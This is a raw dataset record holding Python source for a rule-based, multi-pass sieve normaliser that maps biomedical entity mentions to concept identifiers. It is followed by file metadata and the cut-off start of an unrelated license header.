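        for level, sieve in enumerate(SIEVES, start=1):
            concept.setCui(sieve(concept))
            if concept.getCui() != u"":
                concept.setAlternateCuis(Sieve.getAlternateCuis(concept.getCui()))
                concept.setNormalizingSieveLevel(level)
                return
            if level + 1 > MultiPassSieveNormalizer.maxSieveLevel:
                return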
concept.setNamesKnowledgeBase(concept.getNameExpansion())\n\n @classmethod\n def transformName(self, concept):\n namesForTransformation = list(concept.getNamesKnowledgeBase())\n transformedNames = list()\n\n for nameForTransformation in namesForTransformation:\n prepositionInName = Ling.getStringPreposition(nameForTransformation)\n\n if prepositionInName != u\"\":\n transformedNames = Util.addUnique(transformedNames, PrepositionalTransformSieve.substitutePrepositionsInPhrase(prepositionInName, nameForTransformation))\n transformedNames = Util.setList(transformedNames, PrepositionalTransformSieve.swapPhrasalSubjectAndObject(prepositionInName, re.split(r\"\\s+\", nameForTransformation)))\n else :\n transformedNames = Util.addUnique(transformedNames, PrepositionalTransformSieve.insertPrepositionsInPhrase(nameForTransformation, re.split(r\"\\s+\", nameForTransformation)))\n\n concept.setNamesKnowledgeBase(transformedNames)\n\n @classmethod\n def insertPrepositionsInPhrase(self, phrase, phraseTokens):\n\n newPrepositionalPhrases = list()\n for preposition in Ling.PREPOSITIONS:\n\n newPrepositionalPhrase = (Ling.getSubstring(phraseTokens, 1, len(phraseTokens))+u\" \"+preposition+u\" \"+phraseTokens[0]).strip()\n newPrepositionalPhrases = Util.setList(newPrepositionalPhrases, newPrepositionalPhrase)\n\n newPrepositionalPhrase = (phraseTokens[len(phraseTokens)-1]+u\" \"+preposition+u\" \"+Ling.getSubstring(phraseTokens, 0, len(phraseTokens)-1)).strip()\n newPrepositionalPhrases = Util.setList(newPrepositionalPhrases, newPrepositionalPhrase)\n\n return newPrepositionalPhrases\n\n\n\n @classmethod\n def substitutePrepositionsInPhrase(self, prepositionInPhrase, phrase):\n newPrepositionalPhrases = list()\n for preposition in Ling.PREPOSITIONS:\n if preposition == prepositionInPhrase:\n continue\n\n newPrepositionalPhrase = (phrase.replace(u\" \" + prepositionInPhrase + u\" \", u\" \" + preposition + u\" \")).strip()\n newPrepositionalPhrases = Util.setList(newPrepositionalPhrases, newPrepositionalPhrase)\n\n return newPrepositionalPhrases\n\n @classmethod\n def swapPhrasalSubjectAndObject(self, prepositionInPhrase, phraseTokens) :\n prepositionTokenIndex = Util.getTokenIndex(phraseTokens, prepositionInPhrase)\n return (Ling.getSubstring(phraseTokens, prepositionTokenIndex+1, len(phraseTokens))+u\" \"+\n Ling.getSubstring(phraseTokens, 0, prepositionTokenIndex)).strip() if prepositionTokenIndex != -1 else u\"\"\n\n\nclass SymbolReplacementSieve(Sieve):\n\n @classmethod\n def apply(self, concept):\n SymbolReplacementSieve.transformName(concept)\n return Sieve.normalize(concept.getNamesKnowledgeBase())\n\n @classmethod\n def transformName(self, concept):\n namesForTransformation = list(concept.getNamesKnowledgeBase())\n transformedNames = list()\n\n for nameForTransformation in namesForTransformation:\n transformedNames = Util.addUnique(transformedNames, SymbolReplacementSieve.substituteSymbolsInStringWithWords(nameForTransformation))\n transformedNames = Util.addUnique(transformedNames, SymbolReplacementSieve.substituteWordsInStringWithSymbols(nameForTransformation))\n\n\n concept.setNamesKnowledgeBase(transformedNames)\n\n @classmethod\n def getClinicalReportTypeSubstitutions(self, string):\n newStrings = list()\n for digit in Ling.getDigitToWordMap():\n if string.find(digit) == -1:\n continue\n wordsList = Ling.getDigitToWordMap().get(digit)\n for word in wordsList:\n newString = string.replace(digit, word)\n if newString != string:\n newStrings = Util.setList(newStrings, newString)\n\n return 
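A quick check of the preposition handling above (the phrase is chosen for illustration):

    print(PrepositionalTransformSieve.swapPhrasalSubjectAndObject(
        u"in", re.split(r"\s+", u"pain in chest")))   # u"chest pain"
    print(PrepositionalTransformSieve.substitutePrepositionsInPhrase(
        u"in", u"pain in chest"))                     # [u'pain with chest', u'pain on chest', u'pain of chest']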
newStrings\n\n @classmethod\n def getBiomedicalTypeSubstitutions(self, string):\n if string.find(u\"and/or\") != -1:\n string = string.replace(u\"and/or\", u\"and\")\n if string.find(u\"/\") != -1:\n string = string.replace(u\"/\", u\" and \")\n if string.find(u\" (\") != -1 and string.find(u\")\") != -1:\n string = string.replace(u\" (\", u\"\").replace(u\")\", u\"\")\n elif string.find(u\"(\") != -1 and string.find(u\")\") != -1:\n string = string.replace(u\"(\", u\"\").replace(u\")\", u\"\")\n return string\n\n\n\n @classmethod\n def substituteSymbolsInStringWithWords(self, string):\n newStrings = SymbolReplacementSieve.getClinicalReportTypeSubstitutions(string)\n tempNewStrings = list()\n for newString in newStrings:\n tempNewStrings = Util.setList(tempNewStrings, SymbolReplacementSieve.getBiomedicalTypeSubstitutions(newString))\n newStrings = Util.addUnique(newStrings, tempNewStrings)\n newStrings = Util.setList(newStrings, SymbolReplacementSieve.getBiomedicalTypeSubstitutions(string))\n return newStrings\n\n @classmethod\n def substituteWordsInStringWithSymbols(self, string):\n newStrings = list()\n for word in Ling.getWordToDigitMap():\n if string.find(word) == -1:\n continue\n digit = Ling.getWordToDigitMap().get(word)\n newString = string.replace(word, digit)\n if newString != string:\n newStrings = Util.setList(newStrings, newString)\n\n return newStrings\n\n\nclass HyphenationSieve(Sieve):\n @classmethod\n def apply(self, concept):\n HyphenationSieve.transformName(concept)\n return Sieve.normalize(concept.getNamesKnowledgeBase())\n\n @classmethod\n def transformName(self, concept):\n namesForTransformation = list(concept.getNamesKnowledgeBase())\n transformedNames = list()\n\n for nameForTransformation in namesForTransformation:\n transformedNames = Util.addUnique(transformedNames, HyphenationSieve.hyphenateString(re.split(r\"\\s+\", nameForTransformation)))\n transformedNames = Util.addUnique(transformedNames, HyphenationSieve.dehyphenateString(re.split(r\"\\-\", nameForTransformation)))\n\n\n concept.setNamesKnowledgeBase(transformedNames)\n\n @classmethod\n def hyphenateString(self, stringTokens):\n hyphenatedStrings = list()\n i = 1\n while i < len(stringTokens):\n hyphenatedString = u\"\"\n j = 0\n while j < len(stringTokens):\n if j == i:\n hyphenatedString += u\"-\"+stringTokens[j]\n else:\n hyphenatedString = stringTokens[j] if hyphenatedString == u\"\" else hyphenatedString+u\" \"+stringTokens[j]\n j += 1\n\n hyphenatedStrings = Util.setList(hyphenatedStrings, hyphenatedString)\n i += 1\n return hyphenatedStrings\n\n @classmethod\n def dehyphenateString(self, stringTokens):\n dehyphenatedStrings = list()\n i = 1\n while i < len(stringTokens):\n\n dehyphenatedString = u\"\"\n j = 0\n while j < len(stringTokens):\n if j == i:\n dehyphenatedString += u\" \"+stringTokens[j]\n else:\n dehyphenatedString = stringTokens[j] if dehyphenatedString == u\"\" else dehyphenatedString+u\"-\"+stringTokens[j]\n j += 1\n\n dehyphenatedStrings = Util.setList(dehyphenatedStrings, dehyphenatedString)\n i += 1\n\n return dehyphenatedStrings\n\nclass AffixationSieve(Sieve):\n\n @classmethod\n def apply(self, concept):\n AffixationSieve.transformName(concept)\n return Sieve.normalize(concept.getNamesKnowledgeBase())\n\n @classmethod\n def transformName(self, concept):\n namesForTransformation = list(concept.getNamesKnowledgeBase())\n transformedNames = list()\n\n for nameForTransformation in namesForTransformation:\n transformedNames = Util.addUnique(transformedNames, 
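The hyphenation variants generated above insert or remove a single hyphen at each token boundary; for example:

    print(HyphenationSieve.hyphenateString([u"small", u"cell", u"carcinoma"]))
    # [u'small-cell carcinoma', u'small cell-carcinoma']
    print(HyphenationSieve.dehyphenateString(re.split(r"\-", u"small-cell carcinoma")))
    # [u'small cell carcinoma']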
AffixationSieve.affix(nameForTransformation))\n\n\n concept.setNamesKnowledgeBase(transformedNames);\n\n @classmethod\n def getAllStringTokenSuffixationCombinations(self, stringTokens):\n suffixatedPhrases = list()\n for stringToken in stringTokens:\n suffix = Ling.getSuffix(stringToken)\n forSuffixation = None if suffix == u\"\" else Ling.getSuffixMap().get(suffix)\n\n if len(suffixatedPhrases) == 0:\n if forSuffixation is None:\n suffixatedPhrases = Util.setList(suffixatedPhrases, stringToken)\n elif len(forSuffixation) == 0:\n suffixatedPhrases = Util.setList(suffixatedPhrases, stringToken.replace(suffix, u\"\"))\n else :\n i = 0\n while i < len(forSuffixation):\n suffixatedPhrases = Util.setList(suffixatedPhrases, stringToken.replace(suffix, forSuffixation[i]))\n i += 1\n\n else :\n if forSuffixation is None:\n for i in range(len(suffixatedPhrases)):\n suffixatedPhrases[i] = suffixatedPhrases[i]+u\" \"+stringToken\n\n elif len(forSuffixation) == 0:\n for i in range(len(suffixatedPhrases)):\n suffixatedPhrases[i] = suffixatedPhrases[i]+u\" \"+stringToken.replace(suffix, u\"\")\n\n else:\n tempSuffixatedPhrases = list()\n for i in range(len(suffixatedPhrases)):\n suffixatedPhrase = suffixatedPhrases[i]\n for j in range(len(forSuffixation)):\n tempSuffixatedPhrases = Util.setList(tempSuffixatedPhrases, suffixatedPhrase+u\" \"+stringToken.replace(suffix, forSuffixation[j]))\n\n suffixatedPhrases = list(tempSuffixatedPhrases)\n tempSuffixatedPhrases = None\n\n\n return suffixatedPhrases\n\n @classmethod\n def getUniformStringTokenSuffixations(self, stringTokens, string):\n suffixatedPhrases = list()\n for stringToken in stringTokens:\n suffix = Ling.getSuffix(stringToken)\n forSuffixation = None if suffix == u\"\" else Ling.getSuffixMap().get(suffix)\n\n if forSuffixation == None:\n continue\n\n if len(forSuffixation) == 0:\n Util.setList(suffixatedPhrases, string.replace(suffix, u\"\"))\n continue\n\n for i in range(len(forSuffixation)):\n suffixatedPhrases = Util.setList(suffixatedPhrases, string.replace(suffix, forSuffixation[i]))\n\n return suffixatedPhrases\n\n\n @classmethod\n def suffixation(self, stringTokens, string):\n suffixatedPhrases = AffixationSieve.getAllStringTokenSuffixationCombinations(stringTokens)\n return Util.addUnique(suffixatedPhrases, AffixationSieve.getUniformStringTokenSuffixations(stringTokens, string))\n\n @classmethod\n def prefixation(self, stringTokens, string):\n prefixatedPhrase = u\"\"\n for stringToken in stringTokens:\n prefix = Ling.getPrefix(stringToken)\n forPrefixation = u\"\" if prefix == u\"\" else Ling.getPrefixMap().get(prefix)\n if prefixatedPhrase == u\"\":\n prefixatedPhrase = stringToken if prefix == u\"\" else stringToken.replace(prefix, forPrefixation)\n else:\n prefixatedPhrase = prefixatedPhrase+u\" \"+stringToken if prefix == u\"\" else prefixatedPhrase+u\" \"+stringToken.replace(prefix, forPrefixation)\n\n return prefixatedPhrase\n\n @classmethod\n def affixation(self, stringTokens, string):\n affixatedPhrase = u\"\"\n for stringToken in stringTokens:\n affix = (re.split(r\"\\|\", Ling.AFFIX)[0] if stringToken.find(re.split(r\"\\|\",Ling.AFFIX)[0]) != -1 else re.split(r\"\\|\", Ling.AFFIX)[1]) \\\n if re.match(r\".*(\"+Ling.AFFIX+r\").*\", stringToken) else u\"\"\n forAffixation = u\"\" if affix == u\"\" else Ling.getAffixMap().get(affix)\n if affixatedPhrase == u\"\":\n affixatedPhrase = stringToken if affix == u\"\" else stringToken.replace(affix, forAffixation)\n else:\n affixatedPhrase = affixatedPhrase+u\" \"+stringToken if affix 
== u\"\" else affixatedPhrase+u\" \"+stringToken.replace(affix, forAffixation)\n\n return affixatedPhrase\n\n @classmethod\n def affix(self, string):\n stringTokens = re.split(r\"\\s\", string)\n newPhrases = AffixationSieve.suffixation(stringTokens, string)\n newPhrases = Util.setList(newPhrases, AffixationSieve.prefixation(stringTokens, string))\n newPhrases = Util.setList(newPhrases, AffixationSieve.affixation(stringTokens, string))\n return newPhrases\n\n\nclass DiseaseModifierSynonymsSieve(Sieve):\n\n @classmethod\n def apply(self, concept):\n if concept.getName() not in Ling.PLURAL_DISORDER_SYNONYMS and concept.getName() not in Ling.SINGULAR_DISORDER_SYNONYMS:\n DiseaseModifierSynonymsSieve.transformName(concept)\n return Sieve.normalize(concept.getNamesKnowledgeBase())\n\n return u\"\"\n\n @classmethod\n def transformName(self, concept):\n namesForTransformation = list(concept.getNamesKnowledgeBase())\n transformedNames = list()\n\n for nameForTransformation in namesForTransformation:\n nameForTransformationTokens = re.split(r\"\\s+\", nameForTransformation)\n modifier = DiseaseModifierSynonymsSieve.getModifier(nameForTransformationTokens, Ling.PLURAL_DISORDER_SYNONYMS)\n if modifier != u\"\":\n transformedNames = Util.addUnique(transformedNames, DiseaseModifierSynonymsSieve.substituteDiseaseModifierWithSynonyms(nameForTransformation, modifier, Ling.PLURAL_DISORDER_SYNONYMS))\n transformedNames = Util.setList(transformedNames, DiseaseModifierSynonymsSieve.deleteTailModifier(nameForTransformationTokens, modifier))\n continue\n\n\n modifier = DiseaseModifierSynonymsSieve.getModifier(nameForTransformationTokens, Ling.SINGULAR_DISORDER_SYNONYMS)\n if modifier != u\"\":\n transformedNames = Util.addUnique(transformedNames, DiseaseModifierSynonymsSieve.substituteDiseaseModifierWithSynonyms(nameForTransformation, modifier, Ling.SINGULAR_DISORDER_SYNONYMS))\n transformedNames = Util.setList(transformedNames, DiseaseModifierSynonymsSieve.deleteTailModifier(nameForTransformationTokens, modifier))\n continue\n\n transformedNames = Util.addUnique(transformedNames, DiseaseModifierSynonymsSieve.appendModifier(nameForTransformation, Ling.SINGULAR_DISORDER_SYNONYMS))\n\n\n concept.setNamesKnowledgeBase(transformedNames);\n\n @classmethod\n def substituteDiseaseModifierWithSynonyms(self, string, toReplaceWord, synonyms):\n newPhrases = list()\n for synonym in synonyms:\n if toReplaceWord == synonym:\n continue\n newPhrase = string.replace(toReplaceWord, synonym)\n newPhrases = Util.setList(newPhrases, newPhrase)\n\n return newPhrases\n\n @classmethod\n def deleteTailModifier(self, stringTokens, modifier):\n return Ling.getSubstring(stringTokens, 0, len(stringTokens) - 1) if stringTokens[len(stringTokens) - 1] == modifier else u\"\"\n\n @classmethod\n def appendModifier(self, string, modifiers):\n newPhrases = list()\n for modifier in modifiers:\n newPhrase = string + u\" \" + modifier\n newPhrases = Util.setList(newPhrases, newPhrase)\n\n return newPhrases\n\n\n @classmethod\n def getModifier(self, stringTokens, modifiers):\n for modifier in modifiers:\n index = Util.getTokenIndex(stringTokens, modifier)\n if index != -1:\n return stringTokens[index]\n\n return u\"\"\n\n\nclass StemmingSieve(Sieve):\n @classmethod\n def apply(self, concept):\n StemmingSieve.transformName(concept)\n return StemmingSieve.normalize(concept)\n\n @classmethod\n def transformName(self, concept):\n namesForTransformation = list(concept.getNamesKnowledgeBase())\n transformedNames = list()\n\n for nameForTransformation in 
namesForTransformation:\n transformedNames = Util.setList(transformedNames, Ling.getStemmedPhrase(nameForTransformation))\n\n\n concept.setStemmedNamesKnowledgeBase(transformedNames)\n\n @classmethod\n def normalize(self, concept):\n for name in concept.getStemmedNamesKnowledgeBase():\n cui = StemmingSieve.exactMatchSieve(name)\n if cui != u\"\":\n return cui\n\n return u\"\"\n\n @classmethod\n def exactMatchSieve(self, name):\n cui = u\"\"\n\n # checks against names in training data\n cui = Sieve.getTerminologyNameCui(Sieve.getTrainingDataTerminology().getStemmedNameToCuiListMap(), name)\n if cui != u\"\":\n return cui\n\n # checks against names in dictionary\n cui = Sieve.getTerminologyNameCui(Sieve.getStandardTerminology().getStemmedNameToCuiListMap(), name)\n if cui != u\"\":\n return cui\n\n if Sieve.use_tac2017Terminology:\n cui = Sieve.getTerminologyNameCui(Sieve.getTAC2017Terminology().getStemmedNameToCuiListMap(), name)\n if cui != u\"\":\n return cui\n\n return cui\n\n\n\n\nclass CompoundPhraseSieve(Sieve):\n\n @classmethod\n def applyNCBI(self, name):\n cui = CompoundPhraseSieve.apply(name)\n if cui != u\"\" or (name.find(u\" and \") == -1 and name.find(u\" or \") == -1):\n return cui\n\n compoundWord = u\"and\" if name.find(u\" and \") else u\"or\"\n nameTokens = re.split(r\"\\s+\", name)\n index = Util.getTokenIndex(nameTokens, compoundWord)\n\n if index == 1:\n replacement1 = nameTokens[0]\n replacement2 = nameTokens[2]+u\" \"+nameTokens[3] if nameTokens[2] == u\"the\" else nameTokens[2]\n phrase = replacement1+u\" \"+compoundWord+u\" \"+replacement2\n replacement2 = nameTokens[3] if nameTokens[2] == u\"the\" else nameTokens[2]\n cui1 = Sieve.exactMatchSieve(name.replace(phrase, replacement1))\n\n cui2 = Sieve.exactMatchSieve(name.replace(phrase, replacement2))\n if cui1 != u\"\" and cui2 != u\"\":\n return cui2+u\"|\"+cui1 if cui2+u\"|\"+cui1 in Sieve.getTrainingDataTerminology().getCuiToNameListMap() else cui1+u\"|\"+cui2\n\n\n return u\"\"\n\n @classmethod\n def apply(self, name):\n cui = u\"\"\n\n cui = Sieve.getTerminologyNameCui(Sieve.getTrainingDataTerminology().getCompoundNameToCuiListMap(), name)\n if cui != u\"\":\n return cui\n\n cui = Sieve.getTerminologyNameCui(Sieve.getStandardTerminology().getCompoundNameToCuiListMap(), name)\n if cui != u\"\":\n return cui\n\n if Sieve.use_tac2017Terminology:\n cui = Sieve.getTerminologyNameCui(Sieve.getTAC2017Terminology().getCompoundNameToCuiListMap(), name)\n if cui != u\"\":\n return cui\n\n return cui\n\n\nclass SimpleNameSieve(Sieve):\n\n @classmethod\n def apply(self, concept):\n namesForTransformation = SimpleNameSieve.getNamesForTransformation(concept)\n namesKnowledgeBase = SimpleNameSieve.transformName(namesForTransformation)\n cui = Sieve.normalize(namesKnowledgeBase)\n return SimpleNameSieve.normalize(concept.getName()) if cui == u\"\" else cui\n\n @classmethod\n def getNamesForTransformation(self, concept):\n namesForTransformation = list()\n namesForTransformation.append(concept.getName())\n if concept.getNameExpansion() != u\"\":\n namesForTransformation.append(concept.getNameExpansion())\n return namesForTransformation\n\n @classmethod\n def transformName(self, namesForTransformation):\n transformedNames = list()\n\n for nameForTransformation in namesForTransformation:\n transformedNames = Util.addUnique(transformedNames, SimpleNameSieve.deletePhrasalModifier(nameForTransformation, re.split(r\"\\s\", nameForTransformation)))\n\n\n return transformedNames\n\n @classmethod\n def deletePhrasalModifier(self, 
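Another truthiness pitfall, this time in applyNCBI above: str.find returns -1 (truthy) when the substring is absent and a non-negative index when present, so u"and" if name.find(u" and ") else u"or" picks u"and" even for names that only contain u" or ". The intended test:

    name = u"colon or rectal cancer"
    compound_buggy = u"and" if name.find(u" and ") else u"or"        # u"and" -- find() == -1 is truthy
    compound_fixed = u"and" if name.find(u" and ") != -1 else u"or"  # u"or"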
phrase, phraseTokens):\n newPhrases = list()\n if len(phraseTokens) > 3:\n newPhrase = Ling.getSubstring(phraseTokens, 0, len(phraseTokens)-2)+u\" \"+phraseTokens[len(phraseTokens)-1]\n newPhrases = Util.setList(newPhrases, newPhrase)\n newPhrase = Ling.getSubstring(phraseTokens, 1, len(phraseTokens))\n newPhrases = Util.setList(newPhrases, newPhrase)\n\n return newPhrases\n\n\n @classmethod\n def getTerminologySimpleNames(self, phraseTokens):\n newPhrases = list()\n if len(phraseTokens) == 3 :\n newPhrase = phraseTokens[0]+\" \"+phraseTokens[2]\n newPhrases = Util.setList(newPhrases, newPhrase)\n newPhrase = phraseTokens[1]+\" \"+phraseTokens[2]\n newPhrases = Util.setList(newPhrases, newPhrase)\n\n return newPhrases\n\n @classmethod\n def normalize(self, name):\n cui = u\"\"\n\n cui = Sieve.getTerminologyNameCui(Sieve.getTrainingDataTerminology().getSimpleNameToCuiListMap(), name)\n if cui != u\"\":\n return cui\n\n if Sieve.use_tac2017Terminology:\n cui = Sieve.getTerminologyNameCui(Sieve.getTAC2017Terminology().getSimpleNameToCuiListMap(), name)\n if cui != u\"\":\n return cui\n\n return cui\n\n\nclass PartialMatchNCBISieve:\n @classmethod\n def apply(self, concept):\n name = concept.getName()\n nameTokens = re.split(r\"\\s+\", name)\n return PartialMatchNCBISieve.partialMatch(name, nameTokens)\n\n @classmethod\n def partialMatch(self, phrase, phraseTokens):\n partialMatchedPhrases = list()\n candidateCuiDataMap = PartialMatchNCBISieve.init()\n\n for phraseToken in phraseTokens:\n if phraseToken in Ling.getStopwordsList():\n continue\n candidatePhrases = None\n map = -1\n\n if phraseToken in Sieve.getTrainingDataTerminology().getTokenToNameListMap():\n candidatePhrases = list(Sieve.getTrainingDataTerminology().getTokenToNameListMap().get(phraseToken))\n map = 2\n\n elif phraseToken in Sieve.getStandardTerminology().getTokenToNameListMap():\n candidatePhrases = list(Sieve.getStandardTerminology().getTokenToNameListMap().get(phraseToken))\n map = 3\n\n\n if candidatePhrases is None:\n continue\n\n temp = list()\n for t in candidatePhrases:\n if t in partialMatchedPhrases:\n continue\n temp.append(t)\n candidatePhrases = temp\n\n candidateCuiDataMap = PartialMatchNCBISieve.ncbiPartialMatch(phrase, candidatePhrases, partialMatchedPhrases, Sieve.getTrainingDataTerminology() if map == 2 else Sieve.getStandardTerminology(), candidateCuiDataMap)\n\n return PartialMatchNCBISieve.getCui(candidateCuiDataMap.get(1), candidateCuiDataMap.get(2)) if len(candidateCuiDataMap.get(1)) != 0 else u\"\"\n\n @classmethod\n def init(self):\n candidateCuiDataMap = dict()\n candidateCuiDataMap[1] = dict()\n candidateCuiDataMap[2] = dict()\n return candidateCuiDataMap\n\n @classmethod\n def ncbiPartialMatch(self, phrase, candidatePhrases, partialMatchedPhrases, terminology, cuiCandidateDataMap):\n cuiCandidateMatchingTokensCountMap = cuiCandidateDataMap.get(1)\n cuiCandidateLengthMap = cuiCandidateDataMap.get(2)\n\n for candidatePhrase in candidatePhrases:\n partialMatchedPhrases = Util.setList(partialMatchedPhrases, candidatePhrase)\n\n count = Ling.getMatchingTokensCount(phrase, candidatePhrase)\n length = len(re.split(r\"\\s+\", candidatePhrase))\n cui = terminology.getNameToCuiListMap().get(candidatePhrase)[0]\n\n if cui in cuiCandidateMatchingTokensCountMap:\n oldCount = cuiCandidateMatchingTokensCountMap.get(cui)\n if oldCount < count:\n cuiCandidateMatchingTokensCountMap[cui] = count\n cuiCandidateLengthMap[cui] = length\n\n continue\n\n\n cuiCandidateMatchingTokensCountMap[cui] = count\n 
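getTerminologySimpleNames above (used when indexing the training terminology) keeps the head noun and drops one modifier from three-token names; for example:

    print(SimpleNameSieve.getTerminologySimpleNames([u"acute", u"heart", u"failure"]))
    # [u'acute failure', u'heart failure']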
cuiCandidateLengthMap[cui] = length\n\n\n cuiCandidateDataMap[1] = cuiCandidateMatchingTokensCountMap\n cuiCandidateDataMap[2] = cuiCandidateLengthMap\n return cuiCandidateDataMap\n\n @classmethod\n def getCui(self, cuiCandidateMatchedTokensCountMap, cuiCandidateLengthMap):\n cui = u\"\"\n maxMatchedTokensCount = -1\n matchedTokensCountCuiListMap = dict()\n for candidateCui in cuiCandidateMatchedTokensCountMap:\n matchedTokensCount = cuiCandidateMatchedTokensCountMap.get(candidateCui)\n if matchedTokensCount >= maxMatchedTokensCount:\n maxMatchedTokensCount = matchedTokensCount\n\n cuiList = matchedTokensCountCuiListMap.get(matchedTokensCount)\n if cuiList is None:\n cuiList = list()\n matchedTokensCountCuiListMap[matchedTokensCount] = cuiList\n cuiList = Util.setList(cuiList, candidateCui)\n\n\n candidateCuiList = matchedTokensCountCuiListMap.get(maxMatchedTokensCount)\n if len(candidateCuiList) == 1:\n return candidateCuiList[0]\n else :\n minCandidateLength = 1000\n for candidateCui in candidateCuiList:\n length = cuiCandidateLengthMap.get(candidateCui)\n if length < minCandidateLength:\n minCandidateLength = length\n cui = candidateCui\n\n\n\n return cui\n\n\ndef makedir_and_clear(dir_path):\n if os.path.exists(dir_path):\n shutil.rmtree(dir_path)\n os.makedirs(dir_path)\n else:\n os.makedirs(dir_path)\n\nfrom alphabet import Alphabet\n\nmulti_sieve_dict_alphabet = Alphabet('dict')\n\ndef init(opt, train_data, d, dictionary, dictionary_reverse, isMeddra_dict):\n logging.info(\"initialize the rule-based normalization model ...\")\n\n Ling.setStopwordsList(os.path.join(d.config['norm_rule_resource'], 'stopwords.txt'))\n Abbreviation.setWikiAbbreviationExpansionMap(os.path.join(d.config['norm_rule_resource'], 'ncbi-wiki-abbreviations.txt'))\n Ling.setDigitToWordformMapAndReverse(os.path.join(d.config['norm_rule_resource'], 'number.txt'))\n Ling.setSuffixMap(os.path.join(d.config['norm_rule_resource'], 'suffix.txt'))\n Ling.setPrefixMap(os.path.join(d.config['norm_rule_resource'], 'prefix.txt'))\n Ling.setAffixMap(os.path.join(d.config['norm_rule_resource'], 'affix.txt'))\n\n\n MultiPassSieveNormalizer.maxSieveLevel = int(d.config['norm_rule_num'])\n\n Evaluation.initialize(d)\n\n Sieve.setStandardTerminology(dictionary, isMeddra_dict)\n\n if d.config.get('norm_rule_use_trainset') != '0':\n if train_data is None:\n if isMeddra_dict:\n Sieve.setTrainingDataTerminology_frompath(opt.train_file, dictionary_reverse, isMeddra_dict)\n else:\n Sieve.setTrainingDataTerminology_frompath(os.path.join(opt.train_file, \"bioc\"), dictionary_reverse, isMeddra_dict)\n else:\n Sieve.setTrainingDataTerminology(train_data, dictionary_reverse, isMeddra_dict)\n\n # external corpus\n if d.config.get('norm_ext_corpus') is not None:\n for k, v in d.config['norm_ext_corpus'].items():\n if k == 'tac':\n Sieve.setTAC2017Terminology(v['path'], dictionary)\n else:\n raise RuntimeError(\"wrong configuration\")\n\n\n if multi_sieve_dict_alphabet.keep_growing:\n norm_utils.init_dict_alphabet(multi_sieve_dict_alphabet, dictionary)\n norm_utils.fix_alphabet(multi_sieve_dict_alphabet)\n\n\ndef runMultiPassSieve(document, entities, dictionary, isMeddra_dict):\n\n concepts = list()\n\n abbreviationObject = Abbreviation()\n abbreviationObject.setTextAbbreviationExpansionMap(document.text)\n\n for entity in entities:\n\n try:\n concept = Concept(str(entity.spans[0][0]) + \"|\" + str(entity.spans[0][1]), entity.name, None, None)\n concept.setNameExpansion(document.text, abbreviationObject)\n concept.setStemmedName()\n 
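The tie-breaking in getCui above prefers the candidate with the most matched tokens and, among ties, the shortest candidate name; a toy run (the CUIs are placeholders):

    counts = {u"C1": 2, u"C2": 2, u"C3": 1}        # matched-token count per candidate CUI
    lengths = {u"C1": 4, u"C2": 3, u"C3": 1}       # candidate-name length in tokens
    print(PartialMatchNCBISieve.getCui(counts, lengths))  # u"C2"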
MultiPassSieveNormalizer.applyMultiPassSieve(concept)\n            if concept.getCui() == u\"\":\n                concept.setCui(u\"CUI-less\")\n            concepts.append(concept)\n        except Exception as e:\n            logging.info(\"error when processing {} in {}\".format(entity.name, document.name))\n            concept = Concept(str(entity.spans[0][0]) + \"|\" + str(entity.spans[0][1]), entity.name, None, None)\n            concept.setCui(u\"CUI-less\")\n            concepts.append(concept)\n            continue\n\n\n    # fill norm name and id into entity\n    for idx, entity in enumerate(entities):\n        id = concepts[idx].getCui()\n        if id != u\"CUI-less\":\n            for _id in id.split(\"|\"):\n                if isMeddra_dict:\n                    name = dictionary[_id]\n                    entity.norm_ids.append(_id)\n                    entity.norm_names.append(name)\n                else:\n                    concept = dictionary[_id]\n                    entity.norm_ids.append(_id)\n                    entity.norm_names.append(concept.names)\n\n                if opt.ensemble == 'sum':\n                    confidences = np.zeros([len(dictionary)])\n                    confidences[norm_utils.get_dict_index(multi_sieve_dict_alphabet, _id)] = 1\n                    entity.norm_confidences.append(confidences)\n                if entity.rule_id is None:\n                    entity.rule_id = _id\n\n\n\ndef finalize(shutdownjvm):\n    Ling.clearStopwordsList()\n    Abbreviation.clearWikiAbbreviationExpansionMap()\n    Ling.clearDigitToWordformMapAndReverse()\n    Ling.clearSuffixMap()\n    Ling.clearPrefixMap()\n    Ling.clearAffixMap()\n\n    Sieve.clearStandardTerminology()\n\n    Sieve.clearTrainingDataTerminology()\n\n    Sieve.clearTAC2017Terminology()\n\n    if shutdownjvm:\n        shutdownJVM()\n\ndef train(train_data, dev_data, d, dictionary, dictionary_reverse, opt, fold_idx, isMeddra_dict):\n\n    init(opt, train_data, d, dictionary, dictionary_reverse, isMeddra_dict)\n\n    best_dev_f = -10\n    best_dev_p = -10\n    best_dev_r = -10\n\n    if opt.dev_file:\n        p, r, f = norm_utils.evaluate(dev_data, dictionary, dictionary_reverse, None, None, None, d, isMeddra_dict)\n        logging.info(\"Dev: p: %.4f, r: %.4f, f: %.4f\" % (p, r, f))\n    else:\n        f = best_dev_f\n\n    if f > best_dev_f:\n        logging.info(\"Exceed previous best f score on dev: %.4f\" % (best_dev_f))\n\n        best_dev_f = f\n        best_dev_p = p\n        best_dev_r = r\n\n\n    logging.info(\"train finished\")\n\n    if fold_idx is None:\n        finalize(True)\n    else:\n        if fold_idx == opt.cross_validation-1:\n            finalize(True)\n        else:\n            finalize(False)\n\n    return best_dev_p, best_dev_r, best_dev_f\n\n","sub_path":"multi_sieve.py","file_name":"multi_sieve.py","file_ext":"py","file_size_in_byte":70590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"565978244","text":"\"\"\"\n****************************************************************************************************\n:copyright (c) 2019-2020 URBANopt, Alliance for Sustainable Energy, LLC, and other contributors.\n\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification, are permitted\nprovided that the following conditions are met:\n\nRedistributions of source code must retain the above copyright notice, this list of conditions\nand the following disclaimer.\n\nRedistributions in binary form must reproduce the above copyright notice, this list of conditions\nand the following disclaimer in the documentation and/or other materials provided with the\ndistribution.\n\nNeither the name of the copyright holder nor the names of its contributors may be used to endorse\nor promote products derived from this software without specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR\nIMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, 
